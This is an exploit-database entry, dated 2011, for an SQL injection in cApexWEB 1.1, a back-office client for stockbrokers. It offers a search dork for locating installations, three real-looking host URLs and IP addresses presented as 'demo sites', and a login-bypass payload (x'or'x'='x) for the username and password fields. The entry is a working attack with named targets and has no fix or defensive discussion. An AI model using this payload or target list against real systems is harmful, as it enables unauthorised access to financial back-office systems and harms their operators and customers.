id: 17278
date: 12/15/2011
title: cApexWEB ver1.1 SQL Injection
author: D1rt3 Dud3
cves: 

# Exploit Title: Capexweb Sql Vulnerable
# Date: 15 Dec 2011
# Author: D1rt3 Dud3
# Google Dork: inurl:capexweb
# Gr33ts: Th3 RDX
# Version: 1.1
# Description: Capexweb is Web based Backoffice client used by leading Stock Exchanges like Berkeley Gains, angle broking house etc.
# Demo site:

http://sbo.fwslonline.net:8080/capexweb/capexweb/

http://124.150.136.114:8085/capexweb/capexweb/

http://58.68.97.90:1467/capexweb/capexweb/

Log in details:
Username: x'or'x'='x
Password: x'or'x'='x

-------------------------------------------------------------------------------"Indian" 



#  0day.today [2023-03-22]  #